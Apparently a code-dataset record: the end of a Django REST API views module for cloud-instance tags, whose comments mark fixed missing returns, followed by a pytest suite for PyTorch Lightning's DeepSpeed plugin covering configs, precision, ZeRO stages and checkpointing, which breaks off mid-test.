                core_instance = CoreInstance.objects.filter(
                    provider_alias=instance_id).first()
            serialized_data = InstanceSerializer(
                core_instance,
                context={"request": request}).data
            response = Response(serialized_data, status=status.HTTP_200_OK)
            response['Cache-Control'] = 'no-cache'
            return response
        except (Identity.DoesNotExist) as exc:
            return failure_response(status.HTTP_400_BAD_REQUEST,
                                    "Invalid provider_uuid or identity_uuid.")
        except (socket_error, ConnectionFailure):
            return connection_failure(provider_uuid, identity_uuid)
        except LibcloudInvalidCredsError:
            return invalid_creds(provider_uuid, identity_uuid)
class InstanceTagList(AuthAPIView):
    """
    Tags are a easy way to allow users to group several images as similar
    based on a feature/program of the application.
    """
    def get(self, request, provider_uuid, identity_uuid, instance_id,
            *args, **kwargs):
        """
        List all tags attached to this instance.
        """
        core_instance = get_core_instance(request, provider_uuid,
                                          identity_uuid, instance_id)
        if not core_instance:
            # FIX: the 404 response was previously built but never
            # returned, so execution continued and `None.tags` raised
            # an AttributeError.
            return instance_not_found(instance_id)
        tags = core_instance.tags.all()
        serializer = TagSerializer(tags, many=True)
        return Response(serializer.data)
    def post(self, request, provider_uuid, identity_uuid, instance_id,
             *args, **kwargs):
        """Create a new tag resource
        Params:name -- Name of the new Tag
        Returns:
        Status Code: 201 Body: A new Tag object
        Status Code: 400 Body: Errors (Duplicate/Invalid Name)
        """
        user = request.user
        data = request.data.copy()
        if 'name' not in data:
            return Response("Missing 'name' in POST data",
                            status=status.HTTP_400_BAD_REQUEST)
        core_instance = get_core_instance(request,
                                          provider_uuid,
                                          identity_uuid,
                                          instance_id)
        if not core_instance:
            # FIX: was missing `return` (see get() above).
            return instance_not_found(instance_id)
        # Re-use an existing tag with the same (case-insensitive) name
        # rather than creating a duplicate.
        same_name_tags = CoreTag.objects.filter(name__iexact=data['name'])
        if same_name_tags:
            add_tag = same_name_tags[0]
        else:
            data['user'] = user.username
            data['name'] = data['name'].lower()
            serializer = TagSerializer(data=data)
            if not serializer.is_valid():
                return Response(
                    serializer.errors, status=status.HTTP_400_BAD_REQUEST)
            add_tag = serializer.save()
        core_instance.tags.add(add_tag)
        return Response(status=status.HTTP_204_NO_CONTENT)
class InstanceTagDetail(AuthAPIView):
    """
    Tags are a easy way to allow users to group several images as similar
    based on a feature/program of the application.
    This API resource allows you to Retrieve, Update, or Delete your Tag.
    """
    def delete(self, request, provider_uuid, identity_uuid, instance_id,
               tag_slug, *args, **kwargs):
        """
        Remove the tag, if it is no longer in use.
        """
        core_instance = get_core_instance(request, provider_uuid,
                                          identity_uuid, instance_id)
        if not core_instance:
            # FIX: the 404 response was previously built but never
            # returned, so execution continued and `None.tags` raised
            # an AttributeError.
            return instance_not_found(instance_id)
        try:
            tag = core_instance.tags.get(name__iexact=tag_slug)
        except CoreTag.DoesNotExist:
            return failure_response(
                status.HTTP_404_NOT_FOUND,
                'Tag %s not found on instance' % tag_slug)
        core_instance.tags.remove(tag)
        return Response(status=status.HTTP_204_NO_CONTENT)
    def get(self, request, provider_uuid, identity_uuid, instance_id,
            tag_slug, *args, **kwargs):
        """
        Return the credential information for this tag
        """
        try:
            core_instance = get_core_instance(request, provider_uuid,
                                              identity_uuid, instance_id)
        except ProviderNotActive as pna:
            return inactive_provider(pna)
        except Exception as e:
            return failure_response(
                status.HTTP_409_CONFLICT,
                e.message)
        if not core_instance:
            # FIX: was missing `return` (see delete() above).
            return instance_not_found(instance_id)
        try:
            tag = core_instance.tags.get(name__iexact=tag_slug)
        except CoreTag.DoesNotExist:
            return Response(['Tag does not exist'],
                            status=status.HTTP_404_NOT_FOUND)
        serializer = TagSerializer(tag)
        return Response(serializer.data)
def valid_post_data(data):
    """
    Return any missing required post key names.

    A key counts as missing when it is absent entirely or its value is an
    empty string. FIX: the previous length test was inverted
    (``len(data[key]) > 0``), which flagged every *valid* non-empty string
    value as missing and rejected the key when it was blank or absent only
    by accident of short-circuiting.
    """
    required = ['machine_alias', 'size_alias', 'name']
    return [key for key in required
            if key not in data or
            (isinstance(data[key], str) and len(data[key]) == 0)]
def can_use_instance(user, instance_id, leader_required=False):
    """
    determine if the user is allowed to act on this instance.
    Optionally, if leadership is required, test for it.
    """
    # Leadership narrows the set of instances shared with this user.
    shared_instances = (
        CoreInstance.shared_with_user(user, is_leader=True)
        if leader_required
        else CoreInstance.shared_with_user(user))
    return shared_instances.filter(provider_alias=instance_id).exists()
def keys_not_found(missing_keys):
    """Build the 400 response naming the required POST keys that were absent."""
    message = 'Missing data for variable(s): %s' % missing_keys
    return failure_response(status.HTTP_400_BAD_REQUEST, message)
| 43.118407 | 156 | 0.614599 |
53b7bdbf7f0f031a9b62f8de733c1df144b98a5d | 40,720 | py | Python | tests/plugins/test_deepspeed_plugin.py | aleSuglia/pytorch-lightning | 16213b16356f5bd97b8cc8bf1849eacd68d658c5 | [
"Apache-2.0"
] | 3 | 2021-10-04T05:08:28.000Z | 2021-10-04T06:04:06.000Z | tests/plugins/test_deepspeed_plugin.py | AshleySato899/pytorch-lightning | 854bdc042d12fe4b713de881c58b025de30d0c39 | [
"Apache-2.0"
] | null | null | null | tests/plugins/test_deepspeed_plugin.py | AshleySato899/pytorch-lightning | 854bdc042d12fe4b713de881c58b025de30d0c39 | [
"Apache-2.0"
] | null | null | null | import contextlib
import json
import os
from typing import Any, Dict, Optional
from unittest import mock
import pytest
import torch
import torch.nn.functional as F
from torch import nn, Tensor
from torch.optim import Optimizer
from torch.utils.data import DataLoader
from torchmetrics import Accuracy
from pytorch_lightning import LightningDataModule, LightningModule, seed_everything, Trainer
from pytorch_lightning.callbacks import Callback, LearningRateMonitor, ModelCheckpoint
from pytorch_lightning.plugins import DeepSpeedPlugin, DeepSpeedPrecisionPlugin
from pytorch_lightning.plugins.training_type.deepspeed import LightningDeepSpeedModule
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _DEEPSPEED_AVAILABLE
from tests.helpers.boring_model import BoringModel, RandomDataset, RandomIterableDataset
from tests.helpers.datamodules import ClassifDataModule
from tests.helpers.runif import RunIf
if _DEEPSPEED_AVAILABLE:
import deepspeed
from deepspeed.utils.zero_to_fp32 import convert_zero_checkpoint_to_fp32_state_dict
class ModelParallelBoringModel(BoringModel):
    """BoringModel variant that defers layer creation to ``configure_sharded_model``.

    Used to exercise DeepSpeed sharded-model construction, where parameters
    are instantiated inside ``configure_sharded_model`` instead of
    ``__init__``.
    """
    def __init__(self):
        super().__init__()
        # Layer is intentionally absent until sharded-model setup runs.
        self.layer = None
    def configure_sharded_model(self) -> None:
        self.layer = torch.nn.Linear(32, 2)
    def on_load_checkpoint(self, checkpoint: Dict[str, Any]) -> None:
        # The layer must exist before checkpoint weights are restored.
        self.configure_sharded_model()
class ModelParallelBoringModelNoSchedulers(ModelParallelBoringModel):
    """Sharded BoringModel that returns a bare optimizer (no LR scheduler)."""
    def configure_optimizers(self):
        return torch.optim.SGD(self.layer.parameters(), lr=0.1)
class ModelParallelBoringModelManualOptim(BoringModel):
    """Sharded BoringModel that drives its optimizer manually.

    ``automatic_optimization`` is disabled, so ``training_step`` performs
    zero_grad / backward / step itself (no loss is returned, which is
    valid in manual optimization).
    """
    def __init__(self):
        super().__init__()
        # Layer is created lazily in configure_sharded_model.
        self.layer = None
    def training_step(self, batch, batch_idx):
        opt = self.optimizers()
        output = self(batch)
        loss = self.loss(batch, output)
        opt.zero_grad()
        # manual_backward routes through the plugin/precision machinery.
        self.manual_backward(loss)
        opt.step()
    def configure_sharded_model(self) -> None:
        self.layer = torch.nn.Linear(32, 2)
    def on_load_checkpoint(self, checkpoint: Dict[str, Any]) -> None:
        # Rebuild the layer so checkpoint weights have somewhere to load.
        self.configure_sharded_model()
    @property
    def automatic_optimization(self) -> bool:
        return False
def test_deepspeed_lightning_module(tmpdir):
    """Test to ensure that a model wrapped in `LightningDeepSpeedModule` moves types and device correctly."""
    model = BoringModel()
    module = LightningDeepSpeedModule(model, precision=16)
    # dtype changes applied to the wrapper must propagate to the wrapped model.
    module.half()
    assert module.dtype == torch.half
    assert model.dtype == torch.half
    module.to(torch.double)
    assert module.dtype == torch.double
    assert model.dtype == torch.double
@RunIf(min_gpus=1)
def test_deepspeed_lightning_module_precision(tmpdir):
    """Test to ensure that a model wrapped in `LightningDeepSpeedModule` moves tensors to half when precision
    16."""
    model = BoringModel()
    module = LightningDeepSpeedModule(model, precision=16)
    module.cuda().half()
    assert module.dtype == torch.half
    assert model.dtype == torch.half
    # A float32 input should come back as half because the wrapper casts
    # inputs to the configured precision on forward.
    x = torch.randn((1, 32), dtype=torch.float).cuda()
    out = module(x)
    assert out.dtype == torch.half
    module.to(torch.double)
    assert module.dtype == torch.double
    assert model.dtype == torch.double
@pytest.fixture
def deepspeed_config():
    # Minimal DeepSpeed config dict (same shape as DeepSpeed's JSON config):
    # an SGD optimizer plus a WarmupLR scheduler.
    return {
        "optimizer": {"type": "SGD", "params": {"lr": 3e-5}},
        "scheduler": {
            "type": "WarmupLR",
            "params": {"last_batch_iteration": -1, "warmup_min_lr": 0, "warmup_max_lr": 3e-5, "warmup_num_steps": 100},
        },
    }
@pytest.fixture
def deepspeed_zero_config(deepspeed_config):
    # Extend the base config with ZeRO stage-2 optimization enabled.
    return {**deepspeed_config, "zero_allow_untested_optimizer": True, "zero_optimization": {"stage": 2}}
@RunIf(deepspeed=True)
@pytest.mark.parametrize("plugin", ("deepspeed", DeepSpeedPlugin))
def test_deepspeed_plugin_string(tmpdir, plugin):
    """Test to ensure that the plugin can be passed via string or instance, and parallel devices is correctly
    set."""
    # parameter renamed from `input` to `plugin` to avoid shadowing the builtin
    trainer = Trainer(fast_dev_run=True, default_root_dir=tmpdir, plugins=plugin if isinstance(plugin, str) else plugin())
    assert isinstance(trainer.accelerator.training_type_plugin, DeepSpeedPlugin)
    # CPU-only environment: the plugin should fall back to a single CPU device
    assert trainer.accelerator.training_type_plugin.parallel_devices == [torch.device("cpu")]
@RunIf(deepspeed=True)
def test_deepspeed_plugin_env(tmpdir, monkeypatch, deepspeed_config):
    """Test to ensure that the plugin can be passed via a string with an environment variable."""
    config_path = os.path.join(tmpdir, "temp.json")
    # write the fixture config to disk and point the env variable at it
    with open(config_path, "w") as f:
        json.dump(deepspeed_config, f)
    monkeypatch.setenv("PL_DEEPSPEED_CONFIG_PATH", config_path)
    trainer = Trainer(fast_dev_run=True, default_root_dir=tmpdir, plugins="deepspeed")
    plugin = trainer.accelerator.training_type_plugin
    assert isinstance(plugin, DeepSpeedPlugin)
    assert plugin.parallel_devices == [torch.device("cpu")]
    # the plugin should have loaded exactly the config we wrote out
    assert plugin.config == deepspeed_config
@RunIf(deepspeed=True)
@pytest.mark.parametrize("precision", [16, "mixed"])
@pytest.mark.parametrize(
    "amp_backend",
    # apex is only exercised when the apex requirement is met
    ["native", pytest.param("apex", marks=RunIf(amp_apex=True))],
)
def test_deepspeed_precision_choice(amp_backend, precision, tmpdir):
    """Test to ensure precision plugin is also correctly chosen.
    DeepSpeed handles precision via Custom DeepSpeedPrecisionPlugin
    """
    trainer = Trainer(
        fast_dev_run=True, default_root_dir=tmpdir, plugins="deepspeed", amp_backend=amp_backend, precision=precision
    )
    # regardless of amp backend, DeepSpeed substitutes its own precision plugin
    assert isinstance(trainer.accelerator.training_type_plugin, DeepSpeedPlugin)
    assert isinstance(trainer.accelerator.precision_plugin, DeepSpeedPrecisionPlugin)
    assert trainer.accelerator.precision_plugin.precision == precision
@RunIf(deepspeed=True)
def test_deepspeed_with_invalid_config_path(tmpdir):
    """Test to ensure if we pass an invalid config path we throw an exception."""
    match = "You passed in a path to a DeepSpeed config but the path does not exist"
    with pytest.raises(MisconfigurationException, match=match):
        DeepSpeedPlugin(config="invalid_path.json")
@RunIf(deepspeed=True)
def test_deepspeed_with_env_path(tmpdir, monkeypatch, deepspeed_config):
    """Test to ensure if we pass an env variable, we load the config from the path."""
    config_path = os.path.join(tmpdir, "temp.json")
    with open(config_path, "w") as f:
        json.dump(deepspeed_config, f)
    monkeypatch.setenv("PL_DEEPSPEED_CONFIG_PATH", config_path)
    # no explicit config argument: the plugin must pick it up from the env variable
    assert DeepSpeedPlugin().config == deepspeed_config
@RunIf(deepspeed=True)
def test_deepspeed_defaults(tmpdir):
    """Ensure that defaults are correctly set as a config for DeepSpeed if no arguments are passed."""
    config = DeepSpeedPlugin().config
    assert config is not None
    # default config must at least carry a zero_optimization section
    assert isinstance(config["zero_optimization"], dict)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_warn_deepspeed_override_backward(tmpdir):
    """Test to ensure that if the backward hook in the LightningModule is overridden, we throw a warning."""
    class TestModel(BoringModel):
        # DeepSpeed drives backward itself, so a user-defined override is ignored
        def backward(self, loss: Tensor, optimizer: Optimizer, optimizer_idx: int, *args, **kwargs) -> None:
            return loss.backward()
    model = TestModel()
    trainer = Trainer(fast_dev_run=True, default_root_dir=tmpdir, plugins=DeepSpeedPlugin(), gpus=1, precision=16)
    with pytest.warns(UserWarning, match="will be ignored since DeepSpeed handles the backward"):
        trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True)
@pytest.mark.parametrize(
    ["dataset_cls", "value"],
    [(RandomDataset, "auto"), (RandomDataset, 10), (RandomIterableDataset, "auto"), (RandomIterableDataset, 10)],
)
@mock.patch("deepspeed.init_distributed", autospec=True)
def test_deepspeed_auto_batch_size_config_select(mock_deepspeed_distributed, tmpdir, dataset_cls, value):
    """Test to ensure that the batch size is correctly set as expected for deepspeed logging purposes."""
    class TestModel(BoringModel):
        def train_dataloader(self):
            return DataLoader(dataset_cls(32, 64))
    class AssertCallback(Callback):
        def setup(self, trainer, pl_module, stage: Optional[str] = None) -> None:
            assert isinstance(trainer.accelerator.training_type_plugin, DeepSpeedPlugin)
            config = trainer.accelerator.training_type_plugin.config
            # int value overrides auto mode
            expected_value = value if isinstance(value, int) else 1
            if dataset_cls == RandomDataset:
                # for map-style datasets, "auto" should infer the DataLoader's batch size
                expected_value = pl_module.train_dataloader().batch_size if value == "auto" else value
            assert config["train_micro_batch_size_per_gpu"] == expected_value
            # abort before any training happens; the assertions above are the whole test
            raise SystemExit
    ck = AssertCallback()
    model = TestModel()
    trainer = Trainer(
        default_root_dir=tmpdir,
        fast_dev_run=True,
        callbacks=ck,
        gpus=1,
        plugins=DeepSpeedPlugin(logging_batch_size_per_gpu=value, zero_optimization=False),
    )
    with pytest.raises(SystemExit):
        trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_run_configure_optimizers(tmpdir):
    """Test end to end that deepspeed works with defaults (without ZeRO as that requires compilation), whilst using
    configure_optimizers for optimizers and schedulers."""
    class TestCB(Callback):
        def on_train_start(self, trainer, pl_module) -> None:
            from deepspeed.runtime.zero.stage2 import FP16_DeepSpeedZeroOptimizer
            # Lightning's optimizer should have been wrapped by DeepSpeed
            assert isinstance(trainer.optimizers[0], FP16_DeepSpeedZeroOptimizer)
            assert isinstance(trainer.optimizers[0].optimizer, torch.optim.SGD)
            assert isinstance(trainer.lr_schedulers[0]["scheduler"], torch.optim.lr_scheduler.StepLR)
            # check that the lr_scheduler config was preserved
            assert trainer.lr_schedulers[0]["name"] == "Sean"
    class TestModel(BoringModel):
        def configure_optimizers(self):
            # re-wrap the parent's optimizer/scheduler in the dict form with a name
            [optimizer], [scheduler] = super().configure_optimizers()
            return {"optimizer": optimizer, "lr_scheduler": {"scheduler": scheduler, "name": "Sean"}}
    model = TestModel()
    lr_monitor = LearningRateMonitor()
    trainer = Trainer(
        plugins=DeepSpeedPlugin(),  # disable ZeRO so our optimizers are not wrapped
        default_root_dir=tmpdir,
        gpus=1,
        fast_dev_run=True,
        precision=16,
        callbacks=[TestCB(), lr_monitor],
    )
    trainer.fit(model)
    # the custom scheduler name should be what the LR monitor logs under
    assert lr_monitor.lrs == {"Sean": [0.1]}
    _assert_save_model_is_equal(model, tmpdir, trainer)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_config(tmpdir, deepspeed_zero_config):
    """Test to ensure deepspeed works correctly when passed a DeepSpeed config object including
    optimizers/schedulers and saves the model weights to load correctly."""
    class TestCB(Callback):
        def on_train_start(self, trainer, pl_module) -> None:
            from deepspeed.runtime.lr_schedules import WarmupLR
            from deepspeed.runtime.zero.stage2 import FP16_DeepSpeedZeroOptimizer
            # optimizer and scheduler come from the DeepSpeed config, not configure_optimizers
            assert isinstance(trainer.optimizers[0], FP16_DeepSpeedZeroOptimizer)
            assert isinstance(trainer.optimizers[0].optimizer, torch.optim.SGD)
            assert isinstance(trainer.lr_schedulers[0]["scheduler"], WarmupLR)
    model = BoringModel()
    trainer = Trainer(
        plugins=[DeepSpeedPlugin(config=deepspeed_zero_config)],
        default_root_dir=tmpdir,
        gpus=1,
        fast_dev_run=True,
        precision=16,
        callbacks=[TestCB()],
    )
    trainer.fit(model)
    trainer.test(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_custom_precision_params(tmpdir):
    """Ensure if we modify the FP16 parameters via the DeepSpeedPlugin, the deepspeed config contains these
    changes."""
    class TestCB(Callback):
        def on_train_start(self, trainer, pl_module) -> None:
            # every fp16 knob passed to the plugin must appear in the generated config
            assert trainer.training_type_plugin.config["fp16"]["loss_scale"] == 10
            assert trainer.training_type_plugin.config["fp16"]["initial_scale_power"] == 10
            assert trainer.training_type_plugin.config["fp16"]["loss_scale_window"] == 10
            assert trainer.training_type_plugin.config["fp16"]["hysteresis"] == 10
            assert trainer.training_type_plugin.config["fp16"]["min_loss_scale"] == 10
            # abort: the config assertions above are the whole test
            raise SystemExit()
    model = BoringModel()
    ds = DeepSpeedPlugin(loss_scale=10, initial_scale_power=10, loss_scale_window=10, hysteresis=10, min_loss_scale=10)
    trainer = Trainer(default_root_dir=tmpdir, plugins=[ds], precision=16, gpus=1, callbacks=[TestCB()])
    with pytest.raises(SystemExit):
        trainer.fit(model)
@RunIf(deepspeed=True)
def test_deepspeed_custom_activation_checkpointing_params(tmpdir):
    """Ensure if we modify the activation checkpointing parameters, the deepspeed config contains these changes."""
    plugin = DeepSpeedPlugin(
        partition_activations=True,
        cpu_checkpointing=True,
        contiguous_memory_optimization=True,
        synchronize_checkpoint_boundary=True,
    )
    checkpoint_config = plugin.config["activation_checkpointing"]
    # each flag passed to the plugin must be reflected in the generated config
    for key in (
        "partition_activations",
        "cpu_checkpointing",
        "contiguous_memory_optimization",
        "synchronize_checkpoint_boundary",
    ):
        assert checkpoint_config[key]
@RunIf(min_gpus=1, deepspeed=True)
def test_deepspeed_assert_config_zero_offload_disabled(tmpdir, deepspeed_zero_config):
    """Ensure if we use a config and turn off offload_optimizer, that this is set to False within the config."""
    deepspeed_zero_config["zero_optimization"]["offload_optimizer"] = False
    class TestCallback(Callback):
        # checked before accelerator setup so we see the config as the user provided it
        def on_before_accelerator_backend_setup(self, trainer, pl_module) -> None:
            assert trainer.training_type_plugin.config["zero_optimization"]["offload_optimizer"] is False
            # abort: the config assertion above is the whole test
            raise SystemExit()
    model = BoringModel()
    trainer = Trainer(
        default_root_dir=tmpdir,
        enable_progress_bar=False,
        max_epochs=1,
        plugins=[DeepSpeedPlugin(config=deepspeed_zero_config)],
        precision=16,
        gpus=1,
        callbacks=[TestCallback()],
    )
    with pytest.raises(SystemExit):
        trainer.fit(model)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu(tmpdir):
    """Test to ensure that DeepSpeed with multiple GPUs works and deepspeed distributed is initialized
    correctly."""
    model = BoringModel()
    trainer = Trainer(
        default_root_dir=tmpdir,
        plugins=[DeepSpeedPlugin(stage=3)],
        gpus=2,
        fast_dev_run=True,
        precision=16,
    )
    # spy on (but still execute) deepspeed's distributed init to check it runs exactly once
    with mock.patch("deepspeed.init_distributed", wraps=deepspeed.init_distributed) as distributed_spy:
        trainer.fit(model)
        distributed_spy.assert_called_once()
    trainer.test(model)
    _assert_save_model_is_equal(model, tmpdir, trainer)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_fp32_works(tmpdir):
    """DeepSpeed ZeRO Stage 3 should train without mixed precision (default fp32)."""
    trainer = Trainer(default_root_dir=tmpdir, gpus=1, plugins="deepspeed_stage_3", fast_dev_run=True)
    trainer.fit(BoringModel())
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_stage_3_save_warning(tmpdir):
    """Test to ensure that DeepSpeed Stage 3 gives a warning when saving on rank zero."""
    model = BoringModel()
    trainer = Trainer(
        default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=2, fast_dev_run=True, precision=16
    )
    trainer.fit(model)
    checkpoint_path = os.path.join(tmpdir, "model.pt")
    # both ranks need to call save checkpoint, however only rank 0 needs to check the warning
    context_manager = (
        pytest.warns(UserWarning, match="each worker will save a shard of the checkpoint within a directory.")
        if trainer.is_global_zero
        # nullcontext is the explicit no-op context manager; suppress() with no
        # arguments only worked incidentally
        else contextlib.nullcontext()
    )
    with context_manager:
        trainer.save_checkpoint(checkpoint_path)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_multigpu_single_file(tmpdir):
    """Test to ensure that DeepSpeed loads from a single file checkpoint."""
    model = BoringModel()
    checkpoint_path = os.path.join(tmpdir, "model.pt")
    # produce a plain (non-DeepSpeed) single-file checkpoint first
    trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
    trainer.fit(model)
    trainer.save_checkpoint(checkpoint_path)
    # without load_full_weights, a Stage 3 plugin cannot read a single-file checkpoint
    trainer = Trainer(
        default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=1, fast_dev_run=True, precision=16
    )
    plugin = trainer.training_type_plugin
    assert isinstance(plugin, DeepSpeedPlugin)
    assert not plugin.load_full_weights
    with pytest.raises(MisconfigurationException, match="DeepSpeed was unable to load the checkpoint."):
        trainer.test(model, ckpt_path=checkpoint_path)
    # with load_full_weights=True, the same checkpoint loads successfully
    trainer = Trainer(
        default_root_dir=tmpdir,
        plugins=[DeepSpeedPlugin(stage=3, load_full_weights=True)],
        gpus=1,
        fast_dev_run=True,
        precision=16,
    )
    plugin = trainer.training_type_plugin
    assert isinstance(plugin, DeepSpeedPlugin)
    assert plugin.load_full_weights
    trainer.test(model, ckpt_path=checkpoint_path)
class ModelParallelClassificationModel(LightningModule):
    """Classification model whose layers are built in ``configure_sharded_model`` so
    DeepSpeed ZeRO Stage 3 can partition them as they are created."""
    def __init__(self, lr: float = 0.01, num_blocks: int = 5):
        super().__init__()
        self.lr = lr
        self.num_blocks = num_blocks
        self.prepare_data_per_node = True
        self.train_acc = Accuracy()
        self.valid_acc = Accuracy()
        self.test_acc = Accuracy()
    def make_block(self):
        # one hidden block: Linear without bias followed by ReLU
        return nn.Sequential(nn.Linear(32, 32, bias=False), nn.ReLU())
    def configure_sharded_model(self) -> None:
        # built lazily so DeepSpeed can shard parameters during construction
        self.model = nn.Sequential(*(self.make_block() for x in range(self.num_blocks)), nn.Linear(32, 3))
    def forward(self, x):
        x = self.model(x)
        # Ensure output is in float32 for softmax operation
        x = x.float()
        logits = F.softmax(x, dim=1)
        return logits
    def training_step(self, batch, batch_idx):
        x, y = batch
        logits = self.forward(x)
        loss = F.cross_entropy(logits, y)
        self.log("train_loss", loss, prog_bar=True)
        self.log("train_acc", self.train_acc(logits, y), prog_bar=True, sync_dist=True)
        return {"loss": loss}
    def validation_step(self, batch, batch_idx):
        x, y = batch
        logits = self.forward(x)
        self.log("val_loss", F.cross_entropy(logits, y), prog_bar=False, sync_dist=True)
        self.log("val_acc", self.valid_acc(logits, y), prog_bar=True, sync_dist=True)
    def test_step(self, batch, batch_idx):
        x, y = batch
        logits = self.forward(x)
        self.log("test_loss", F.cross_entropy(logits, y), prog_bar=False, sync_dist=True)
        self.log("test_acc", self.test_acc(logits, y), prog_bar=True, sync_dist=True)
    def predict_step(self, batch, batch_idx, dataloader_idx=None):
        x, y = batch
        logits = self.forward(x)
        self.test_acc(logits, y)
        return self.test_acc.compute()
    def configure_optimizers(self):
        optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)
        lr_scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=0.99)
        # scheduler steps per batch rather than per epoch
        return [optimizer], [{"scheduler": lr_scheduler, "interval": "step"}]
    def on_load_checkpoint(self, checkpoint: Dict[str, Any]) -> None:
        # the model may not have been built yet when restoring from a checkpoint
        if not hasattr(self, "model"):
            self.configure_sharded_model()
class ManualModelParallelClassificationModel(ModelParallelClassificationModel):
    """Manual-optimization variant of the sharded classification model."""
    @property
    def automatic_optimization(self) -> bool:
        return False
    def training_step(self, batch, batch_idx):
        x, y = batch
        logits = self.forward(x)
        loss = F.cross_entropy(logits, y)
        opt = self.optimizers()
        self.log("train_loss", loss, prog_bar=True)
        self.log("train_acc", self.train_acc(logits, y), prog_bar=True, sync_dist=True)
        # manual optimization: zero -> backward -> step, performed explicitly
        opt.zero_grad()
        self.manual_backward(loss)
        opt.step()
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3(tmpdir, deepspeed_config):
    """Test to ensure ZeRO Stage 3 works with a parallel model."""
    model = ModelParallelBoringModel()
    trainer = Trainer(
        default_root_dir=tmpdir,
        plugins=[DeepSpeedPlugin(stage=3)],
        gpus=2,
        fast_dev_run=True,
        precision=16,
    )
    trainer.fit(model)
    trainer.test(model)
    # saved checkpoint must round-trip to the same weights
    _assert_save_model_is_equal(model, tmpdir, trainer)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3_manual_optimization(tmpdir, deepspeed_config):
    """Test to ensure ZeRO Stage 3 works with a parallel model."""
    model = ModelParallelBoringModelManualOptim()
    # disable the epoch-end hook; manual-optim training_step returns nothing to aggregate
    model.training_epoch_end = None
    trainer = Trainer(
        default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=2, fast_dev_run=True, precision=16
    )
    trainer.fit(model)
    trainer.test(model)
    _assert_save_model_is_equal(model, tmpdir, trainer)
def run_checkpoint_test(tmpdir: str, automatic_optimization: bool = True, accumulate_grad_batches: int = 2):
    """Train a sharded classification model with ZeRO Stage 3, then verify the test metric
    is reproducible when restoring the best checkpoint — both on the original trainer and
    on a freshly constructed one."""
    seed_everything(1)
    if automatic_optimization:
        model = ModelParallelClassificationModel()
    else:
        model = ManualModelParallelClassificationModel()
    dm = ClassifDataModule()
    ck = ModelCheckpoint(monitor="val_acc", mode="max", save_last=True, save_top_k=-1)
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=10,
        plugins=[DeepSpeedPlugin(stage=3)],
        gpus=2,
        precision=16,
        accumulate_grad_batches=accumulate_grad_batches,
        callbacks=[ck],
    )
    trainer.fit(model, datamodule=dm)
    results = trainer.test(datamodule=dm)
    assert results[0]["test_acc"] > 0.7
    # reloading the best checkpoint on the same trainer must reproduce the metrics
    saved_results = trainer.test(ckpt_path=ck.best_model_path, datamodule=dm)
    assert saved_results[0]["test_acc"] > 0.7
    assert saved_results == results
    # a brand-new trainer/model must also restore correctly from the same checkpoint
    if automatic_optimization:
        model = ModelParallelClassificationModel()
    else:
        model = ManualModelParallelClassificationModel()
    trainer = Trainer(default_root_dir=tmpdir, gpus=2, plugins=[DeepSpeedPlugin(stage=3)], precision=16)
    results = trainer.test(model, datamodule=dm, ckpt_path=ck.best_model_path)
    assert results[0]["test_acc"] > 0.7
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3_checkpointing(tmpdir):
    """Test to ensure with Stage 3 and multiple GPUs that we can save/load a model resuming from a checkpoint, and
    see convergence."""
    # defaults: automatic optimization with accumulate_grad_batches=2
    run_checkpoint_test(tmpdir)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3_warns_resume_training(tmpdir):
    """Test to ensure with Stage 3 and multiple GPUs that we can resume from training, throwing a warning that the
    optimizer state and scheduler states cannot be restored."""
    dm = ClassifDataModule()
    model = BoringModel()
    checkpoint_path = os.path.join(tmpdir, "model.pt")
    # create a plain single-file checkpoint (no DeepSpeed sharding)
    trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
    trainer.fit(model)
    trainer.save_checkpoint(checkpoint_path)
    # resuming Stage 3 training from that single file can only restore weights
    trainer = Trainer(
        default_root_dir=tmpdir,
        fast_dev_run=True,
        plugins=DeepSpeedPlugin(stage=3, load_full_weights=True),
        gpus=1,
        precision=16,
        resume_from_checkpoint=checkpoint_path,
    )
    with pytest.warns(
        UserWarning,
        match="A single checkpoint file has been given. This means optimizer states and "
        "scheduler states can not be restored. If you'd like to restore these states, you must "
        "provide a path to the originally saved DeepSpeed checkpoint.",
    ):
        trainer.fit(model, datamodule=dm)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3_resume_training(tmpdir):
    """Test to ensure with Stage 3 and multiple GPUs that we can resume training."""
    initial_model = ModelParallelClassificationModel()
    dm = ClassifDataModule()
    ck = ModelCheckpoint(monitor="val_acc", mode="max", save_last=True, save_top_k=-1)
    # short initial run that produces a DeepSpeed checkpoint to resume from
    initial_trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_train_batches=2,
        limit_val_batches=2,
        limit_test_batches=2,
        plugins=DeepSpeedPlugin(stage=3),
        gpus=1,
        precision=16,
        callbacks=[ck],
    )
    initial_trainer.fit(initial_model, datamodule=dm)
    class TestCallback(Callback):
        def on_train_batch_start(
            self, trainer: Trainer, pl_module: LightningModule, batch: Any, batch_idx: int
        ) -> None:
            original_deepspeed_plugin = initial_trainer.accelerator.training_type_plugin
